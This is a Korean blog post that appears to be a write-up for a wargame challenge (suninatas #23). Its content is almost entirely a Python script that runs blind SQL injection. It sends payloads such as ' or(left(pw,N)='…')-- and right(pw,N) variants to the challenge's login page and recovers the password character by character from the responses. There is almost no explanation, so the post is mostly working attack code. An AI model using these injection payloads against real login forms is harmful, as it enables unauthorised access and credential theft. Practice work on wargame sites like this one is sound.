블로그 이미지
ludwings

카테고리

분류 전체보기 (130)
WIN API (22)
워게임 (61)
만든것 (2)
메모 (37)
Total17,890
Today1
Yesterday1

>>> param = 'v'
>>> num="0123456789"
for i in range(2,9):
 full_param="http://www.suninatas.com/Part_one/web23/web23.asp?id=%27+or%28left%28pw%2C"+num[i]+"%29%3D%27"+param
 for j in range(len(words)):
  tmp = full_param+words[j]+"%27%29--&pw=1"
  resp = opener.open(tmp)
  str = resp.read().decode('utf-8')
  if str.find('OK')>-1:
   param = param+words[j]
   print(words[j])
   break


>>> param=""
>>> for i in range(1,9):
 full_param="http://www.suninatas.com/Part_one/web23/web23.asp?id=%27+or%28right%28pw%2C"+num[i]+"%29%3D%27"
 for j in range(len(words)):
  tmp = full_param+words[j]+param+"%27%29--&pw=1"
  resp = opener.open(tmp)
  str = resp.read().decode('utf-8')
  if str.find('OK')>-1:
   param = words[j]+param
   print(words[j])
   break


오른쪽

 

'워게임 > 기타' 카테고리의 다른 글

suninatas 올클리어~~  (4) 2013.12.27
suninatas 26번  (0) 2013.12.27
suninatas 24 25  (0) 2013.12.19
suninatas 23번 blind sql injection  (0) 2013.12.17
suninatas 22번 blind sql injection  (0) 2013.12.16
b1inder.dothome.co.kr ] Crypto 4  (1) 2013.12.04
Posted by ludwings

댓글을 달아 주세요

최근에 달린 댓글

최근에 받은 트랙백

글 보관함